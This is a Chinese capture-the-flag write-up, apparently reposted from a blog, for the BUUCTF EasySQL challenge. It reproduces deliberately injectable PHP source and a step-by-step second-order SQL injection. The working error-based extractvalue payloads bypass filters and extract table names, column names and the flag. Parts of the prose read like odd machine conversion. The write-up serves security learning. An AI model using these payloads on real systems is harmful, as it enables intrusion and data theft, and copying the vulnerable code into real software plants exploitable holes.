60，【1】BUUCF web [RCTF2015]EasySQL1

先查看源码

1，changepwd（修改密码）

1. <?php
2. // 开启会话，以便使用会话变量
3. session_start();
5. // 设置页面的内容类型为 HTML 并使用 UTF-8 编码
6. header("Content-Type: text/html; charset=UTF-8");
9. // 引入配置文件，通常包含数据库连接信息等
10. require_once 'config.php';
12. // 输出一个表单，用于用户输入旧密码和新密码
13. echo '<form action="" method="post"><p>oldpass: <input type="text" name="oldpass" /></p><p>newpass: <input type="text" name="newpass" /></p><input type="submit" value="Submit" /></form>';
15. // 检查是否提交了旧密码和新密码
16. if (isset($_POST['oldpass']) && isset($_POST['newpass'])) {
17.     // 将用户输入的旧密码进行 MD5 哈希处理
18.     $oldpass = md5($_POST['oldpass']);
19.     // 将用户输入的新密码进行 MD5 哈希处理
20.     $newpass = md5($_POST['newpass']);
21.     // 获取当前登录用户的用户名，存储在会话中
22.     $username = $_SESSION['username'];
23.     // 构建 SQL 语句，用于更新用户的密码，使用用户输入的旧密码验证用户身份
24.     $sql = "update users set pwd='$newpass' where name="$username" and pwd='$oldpass'";
25.     // var_dump($sql);
26.     // 执行 SQL 查询
27.     $query = mysql_query($sql);
28.     // 检查查询是否成功执行
29.     if ($query) {
30.         // 如果查询成功，退出脚本，可根据需要修改为更有意义的操作，如显示成功消息
31.         exit('');
32.     } else {
33.         // 如果查询失败，输出 MySQL 错误信息并终止脚本
34.         die(mysql_error());
35.     }
36. }
37. ?>

复制代码

此文件表明会对输入的用户名和密码举行MD5哈希处理

以是数据库中存储的是MD5哈希值

查询成功，此文件执行结束，如果失败，会输出MySQL错误信息

似乎是报错注入

2，config（配置文件）

1. <?php
2. // 定义数据库主机地址和端口号
3. $dbhost = 'localhost:3306';
4. // 定义数据库用户名
5. $dbuser = 'root';
6. // 定义数据库密码，这里是空密码
7. $dbpass = '';
8. // 使用 mysql_connect 函数尝试连接到数据库服务器，传递主机、用户名和密码作为参数
9. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
12. // 选择要使用的数据库，这里选择的是名为 'web_sqli' 的数据库
13. mysql_select_db('web_sqli');
14. // 设置字符集为 utf8，确保数据库操作使用 utf8 编码，避免乱码问题
15. mysql_query('set NAMES utf8');
18. // 检查是否开启了魔术引号，如果没有开启，则对 POST 和 GET 数据进行转义处理
19. if (!get_magic_quotes_gpc()) {
20.     // 遍历 POST 数据，对其中的每个元素进行转义处理
21.     foreach ($_POST as $key => $value) {
22.         // 使用 addslashes 函数对值进行转义，防止 SQL 注入
23.         $_POST[$key] = addslashes($value);
24.     }
25.     // 遍历 GET 数据，对其中的每个元素进行转义处理
26.     foreach ($_GET as $key => $value) {
27.         // 使用 addslashes 函数对值进行转义，防止 SQL 注入
28.         $_GET[$key] = addslashes($value);
29.     }
30. }
31. ?>

复制代码

此文件表明数据库用户名为root，密码是空密码

而且检查是否开启了魔术引号，未开启时对post,get数据举行转义处理

3，index（默认首页文件）

1. <?php
2. // 开始一个新的会话或继续已有的会话
3. session_start();
5. // 设置 HTTP 响应头，指定内容类型为 text/html 且字符编码为 UTF-8
6. header("Content-Type: text/html; charset=UTF-8");
8. // 引入配置文件，通常包含数据库连接信息等
9. require_once 'config.php';
11. // 检查是否已经设置了会话中的用户名，这通常表示用户已经登录
12. if (isset($_SESSION['username'])) {
13.     // 输出欢迎信息，并显示用户的名字作为一个链接，指向 user.php 页面
14.     echo "Hi,<a href='user.php'>".$_SESSION['username']."</a>";
15.     // 输出一个无序列表的开始标签
16.     echo "<ul>";
17.     // 输出列表项，链接到 index.php 并传递不同的 title 参数
18.     echo "<li><a href='index.php?title=lcsg'>良辰诗歌</a></li>";
19.     echo "<li><a href='index.php?title=wyzb'>网友装逼</a></li>";
20.     echo "<li><a href='index.php?title=zrtbf'>赵日天不服</a></li>";
21.     // 输出无序列表的结束标签
22.     echo "</ul>";
24.     // 检查是否从 GET 请求中接收到了 title 参数
25.     if (isset($_GET['title'])) {
26.         // 获取 GET 请求中的 title 参数的值
27.         $title = $_GET['title'];
28.         // 构建一个 SQL 查询语句，根据 title 从 article 表中查询数据
29.         $sql = "select * from article where title='$title'";
30.         // 执行 SQL 查询
31.         $query = mysql_query($sql);
32.         // 检查查询是否成功执行
33.         if ($query) {
34.             // 获取查询结果的一行数据作为关联数组
35.             $row = mysql_fetch_array($query);
36.             // 输出查询结果中 content 列的数据
37.             echo $row['content'];
38.         }
39.     }
40. } else {
41.     // 如果用户没有登录，输出匿名用户的欢迎信息
42.     echo "Hi,Anonymous<br>";
43.     // 输出登录页面的链接
44.     echo "<a href='./login.php'>LOGIN</a><br>";
45.     // 输出注册页面的链接
46.     echo "<a href='./register.php'>REGISTER</a><br>";
47. }
48. ?>

复制代码

4，login（登录）

1. <?php
2. // 开始一个新的会话或继续已有的会话
3. session_start();
5. // 设置 HTTP 响应头，指定内容类型为 text/html 并使用 UTF-8 编码
6. header("Content-Type: text/html; charset=UTF-8");
8. // 引入配置文件，通常包含数据库连接信息等
9. require_once 'config.php';
11. // 输出一个 HTML 表单，用户可以在其中输入用户名和密码，表单提交到 login.php 页面，使用 POST 方法
12. echo '<form action="login.php" method="post"><p>username: <input type="text" name="username" /></p><p>password: <input type="text" name="password" /></p><input type="submit" value="Submit" /></form>';
15. // 检查是否通过 POST 方法提交了用户名和密码
16. if (isset($_POST['username']) && isset($_POST['password'])) {
17.     // 获取用户输入的用户名
18.     $username = $_POST['username'];
19.     // 使用 MD5 对用户输入的密码进行哈希处理（这种方式已不安全，建议使用 password_hash 函数）
20.     $password = md5($_POST['password']);
21.     // 构建 SQL 查询语句，用于从 users 表中查找匹配的用户名和密码
22.     $sql = "SELECT * FROM users WHERE name = '$username' and pwd = '$password'";
23.     // 执行 SQL 查询
24.     $query = mysql_query($sql);
25.     // 检查查询结果是否正好有一行（即找到一个匹配的用户）
26.     if (mysql_num_rows($query) == 1) {
27.         // 获取查询结果的一行数据
28.         $row = mysql_fetch_array($query);
29.         // 将用户名存储在会话中，用于后续页面判断用户是否已登录
30.         $_SESSION['username'] = $row['name'];
31.         // 重定向到 index.php 页面
32.         header('Location: index.php');
33.         // 终止脚本执行
34.         die();
35.     } else {
36.         // 如果未找到匹配用户，输出登录错误信息并终止脚本
37.         die('<br>login error');
38.     }
39. }
40. ?>

复制代码

看完这个源码后就看不到了

只能先辈靶场了


进入靶场

实验输入

无效字符串

不管输啥都说无效字符串，，，，，，

后来发现似乎是Email出了问题

知道了一个用户名（猜测可以通过新注册一个账号来更改admin账户的密码）
以此来注册一个账号

登录

看到此页面

点击admin#后发现可以更改密码
那就先把admin账号的密码改了

改成123

登录看看

好打脸啊
一开始输admin'说无效字符串后就没输过'了
补上再输一遍
照旧错的？？？？？？？？？？？？？？？？？？？？
试试  "

好吧，也是对了，以后菜就多试

先都点进去看看

so，我是什么很贱的人吗，给我看这个

不外通过以上操纵，得知存在二次注入
根据源码知道它会报错
而且一开始的操纵知道它会过滤
50.【8】BUUCTF WEB HardSql-CSDN博客
参考这篇博客的语句

1,查询库名


admin"^extractvalue(1,concat(0x7e,(select(database()))))#
(#是以get方式提交时使用的，-- -和-- +是以post方式提交时使用的，%23在url处使用）

2,查询表名

admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('~web_sqli'))))#

???
实验了一下，是把like过滤了
改

admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='~web_sqli')))#

空缺？？？

改

admin"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='~web_sqli')))#

照旧空缺？？？？？？？？？

改

admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))#

把库名带进去就报不出来，那我求库名的操纵算什么？？？？

算我。。

3,查询字段名

admin"^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag')))#

4,查询字段内容

admin"^extractvalue(1,concat(0x7e,(select(flag)from(flag))))#

变

admin"^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users')))#
 

语义未尽

改

用right让背面的爆出来

admin"^extractvalue(1,right(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),32))#

要不我照旧去四八（好不轻易把括号一组一组对上）
他把right过滤了
改

admin"^extractvalue(1,concat(0x7e,reverse((select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'))))#

终于终于

admin"^extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users))))#

？？？还好还好，快结束了
下午学姐刚好讲了正则表达式
admin"^extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f'))))#

admin"^extractvalue(1,concat(0x7e,reverse((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')))))#

手动拼一下
flag{090f0996-0d57-4a30-b0d9-92675185411f}

over

笔记

1，该用字典还得用字典
2，extractvalue
3，空格被过滤的题目第一遍就认真留意（）的个数，千万别再多一个少一个了


 



免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。